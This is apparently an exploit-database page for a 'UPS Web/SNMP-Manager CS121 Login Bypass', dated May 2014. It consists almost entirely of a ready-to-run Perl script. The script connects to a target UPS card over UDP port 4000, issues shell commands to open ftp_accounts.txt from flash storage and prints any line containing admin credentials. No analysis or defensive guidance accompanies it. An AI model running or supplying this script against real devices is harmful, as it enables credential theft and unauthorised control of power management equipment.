Home / exploitsPDF  

UPS Web/SNMP-Manager CS121 Login Bypass

Posted on 19 May 2014

#!/usr/bin/perl -w use IO::Socket; use constant MAXBYTES => scalar 1024; $socket = IO::Socket::INET->new( PeerPort => 4000, PeerAddr => $ARGV[0], Type => SOCK_DGRAM, Proto => 'udp'); $socket->send("<VERSION>"); $socket->recv($inline, MAXBYTES); print "UPS: $inline "; $socket->send("show syspar"); $socket->recv($inline, MAXBYTES); print "$inline "; print "Searching login " ; $socket->send("start"); $socket->recv($inline, MAXBYTES); $socket->send("cd /flash"); $socket->send("type ftp_accounts.txt"); while($socket->recv($inline, MAXBYTES)) { if($inline =~ /admin/ig) { print $inline; exit; } } sleep(1);

 

TOP